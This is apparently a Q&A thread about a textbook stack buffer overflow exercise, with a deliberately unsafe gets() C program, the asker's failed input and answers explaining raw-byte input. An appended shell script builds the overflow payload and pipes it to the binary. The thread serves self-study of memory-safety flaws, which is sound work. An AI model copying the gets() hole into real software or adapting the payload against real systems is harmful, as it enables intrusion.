
I was experimenting with some code described in "The Shellcoder's Handbook" where you overflow a buffer and cause the same code to be executed twice...

#include <stdio.h>

/* Deliberately unsafe: gets() has no bound, so input longer than the
   5-byte array overwrites the saved frame pointer and return address. */
void return_input (void)
{ char array[5];
  gets (array);
  printf("%s\n", array);
}
int main(void)
{
  return_input();
  return 0;
}

The task was to overflow the buffer and to replace the address of 'return 0' with the address of 'return_input()' so that the entered string is printed twice.

I compiled it as follows

gcc -fno-stack-protector overflow.c

to override the protection mechanisms. The problem is I can't get it to execute twice. In this case the address of the function ri() is at 0x08048440. I gave the input as follows

./a.out
aaaaaaaaaaaaa\x40\x84\x04\x08 

Shouldn't this cause the function to be called twice? It always returns

aaaaaaaaaaaaaaaa�� 
Segmentation fault (core dumped)

How can I overflow the buffer to call the function twice?

  • @BenGreen I am trying to learn by myself. If this question was assigned as homework, the tutors would have already taught me how to run a basic exploit and then try it out on my own. Or, in English: I wouldn't have asked this question in the first place :) Commented Jun 1, 2013 at 11:37
  • @BenGreen the homework tag was deprecated months ago and is now removed: meta.stackexchange.com/questions/147100/… Commented Jun 1, 2013 at 11:45

3 Answers


\x40\x84\x04\x08 is not supported. You should use some other program to translate the hex input to bytes.

If you are using bash, you can try echo -e '\x40\x84\x04\x08' | ./a.out. I found that solution at linux shell scripting: hex string to bytes


By definition, the behavior of a buffer overflow is unpredictable. You will only get the same behavior if you happen to be using the same version of the same compiler with the same settings on the same OS, etc., etc.


Based on your machine type, you might need to adjust. http://www.tenouk.com/Bufferoverflowc/Bufferoverflow4.html

3 Comments

Thank you so very much for this information. It works!!!! I would like to learn more about this subject and would be greatly indebted to you if you can share more resources. Hope you would help. Thanks again! :)
If the information was relevant, please mark it as the answer.
This link should allow you to experiment and correct your code: users.ece.cmu.edu/~jprimero/Simulator.html. Copy and paste your code above and see the execution in action.
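The two practical points raised in the answers above are that the address has to reach the program as raw bytes (the first answer) and that the distance from array[] to the saved return address depends on the build (the third answer). The script below is an added example, not code from the question or from any of the answers: it turns a 32-bit address into little-endian bytes with portable printf(1) octal escapes, prepends a chosen amount of filler, and dumps the result so you can see exactly what reaches the program's stdin. It assumes a 32-bit x86 binary (gcc -m32), so the address is four bytes little-endian; 0x08048440 and the 13-byte offset are simply the values quoted in the question and are only valid for that particular binary, and the filler byte 'A' is an arbitrary choice.

```shell
#!/bin/sh
# Added example, not code from the question or the answers above.
# Builds the overflow payload for the return_input() program: PAD bytes of
# filler followed by the 32-bit return address in little-endian order,
# emitted as raw bytes. Typing \x40\x84\x04\x08 at the prompt sends the
# literal characters '\', 'x', '4', '0', ..., which is why the original
# attempt never put the intended value into the saved return address.
#
# Assumptions: a 32-bit x86 build (gcc -m32), so the address is four bytes
# little-endian; 0x08048440 is the address quoted in the question and is
# only valid for that binary. The filler byte 'A' (0x41) is arbitrary.

# le32 ADDR: ADDR as four little-endian bytes, written as \0NNN octal
# escapes that printf '%b' understands on any POSIX shell (the \xNN form
# used in the answers is a bash extension).
le32() {
    addr=$(( $1 ))
    i=0
    while [ "$i" -lt 4 ]; do
        printf '\\0%03o' $(( (addr >> (8 * i)) & 0xff ))
        i=$((i + 1))
    done
}

# payload PAD ADDR: PAD filler bytes, then ADDR little-endian, as raw bytes.
payload() {
    pad=$1
    addr=$2
    filler=''
    i=0
    while [ "$i" -lt "$pad" ]; do
        filler="${filler}A"
        i=$((i + 1))
    done
    printf '%s' "$filler"
    # '%b' expands the octal escapes into the actual address bytes.
    printf '%b' "$(le32 "$addr")"
}

# payload_hex PAD ADDR: the same bytes as a one-line hex dump, to check
# what really reaches the program's stdin.
payload_hex() {
    payload "$1" "$2" | od -An -tx1 | tr -s ' \n' ' ' | sed 's/^ //; s/ $//'
}

# Usage against the question's build (offset and address are the
# question's own values and must be re-derived for any other binary):
#   payload 13 0x08048440 | ./a.out
#   payload_hex 13 0x08048440
```

Two caveats when using this. First, the 13-byte offset is not a constant: the padding the compiler inserts between the 5-byte array and the saved return address varies with compiler version, flags and architecture, so confirm it for your own binary (for example by inspecting the frame in gdb, or by sending a distinctive pattern and reading the faulting address) before trusting the number. Second, keep the program's stdout on the terminal rather than piping it: after return_input() runs the second time the program returns into whatever lies above the overwritten slot and crashes, and a fully buffered pipe would lose the second line of output even though the call happened.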
